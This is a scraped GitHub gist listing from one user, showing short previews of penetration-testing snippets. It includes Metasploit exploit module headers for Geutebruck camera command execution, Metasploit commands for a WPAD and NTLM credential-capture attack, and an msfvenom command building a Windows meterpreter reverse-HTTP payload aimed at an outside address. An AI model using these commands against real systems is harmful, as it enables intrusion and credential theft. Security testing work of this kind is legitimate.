Skip to content

Instantly share code, notes, and snippets.

ddouhine

Block or report user

Report or block ddouhine

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@ddouhine
ddouhine / geutebruck_simple_loglistjs.rb
Created Aug 2, 2018
Geutebruck simple_loglistjs.cgi Remote Command Execution Metasploit Module
View geutebruck_simple_loglistjs.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
View geutebruck_testaction.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
View [JtR] Add JBoss||Wildfly hash format
/////////////////////////////////////////////////////////////////////////////////////////////
Add these lines to JtR /run/dynamic.conf:
/////////////////////////////////////////////////////////////////////////////////////////////
[List.Generic:dynamic_1591]
Expression=md5($u:ManagementRealm:$p)
CONST1=:ManagementRealm:
Flag=MGF_USERNAME
Flag=MGF_NOTSSE2Safe
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_userid
@ddouhine
ddouhine / gist:b3e5c7928bd35ebbf892
Created Oct 7, 2015
Network/web related online tools
View gist:b3e5c7928bd35ebbf892
http://wtfismyip.com/
http://web-sniffer.net/
http://www.urlquery.net/
http://www.rexswain.com/httpview.html
http://httpbin.org
http://requestb.in
View msf mitm
use auxiliary/server/wpad
set PROXY x.x.x.x
run
use auxiliary/server/capture/http_ntlm
set CAINPWFILE /root/cain.http.pw
set JOHNPWFILE /root/john.http.pw
set URIPATH /
set SRVPORT 80
run
View gist:441a72314c3c814c7c1b
3999,5000,5005,8000,8453,8787-8788,9001,18000
View gist:21c560514b30ce235960
.../metasploit_4.11.3-2015062101-1kali0_i386.deb
root@kali:~# msfvenom -p windows/meterpreter_reverse_http exitfunc=thread lhost=1.1.1.5 R -a x86 -f exe --platform windows > meter_1.1.1.5.exe
No encoder or badchars specified, outputting raw payload
View gist:55ef31ca1d23cfd72863
https://addons.mozilla.org/firefox/downloads/latest/966/addon-966-latest.xpi?src=dp-btn-primary
View Tomcat
//tomcat version
get and unzip $TOMCAT_HOME/server/lib/catalina.jar
cat org/apache/catalina/util/ServerInfo.properties
cat META-INF/MANIFEST.MF
grep -ri version * | more
(...)
META-INF/MANIFEST.MF:Specification-Version: 6.0
META-INF/MANIFEST.MF:Implementation-Version: 6.0.35
You can’t perform that action at this time.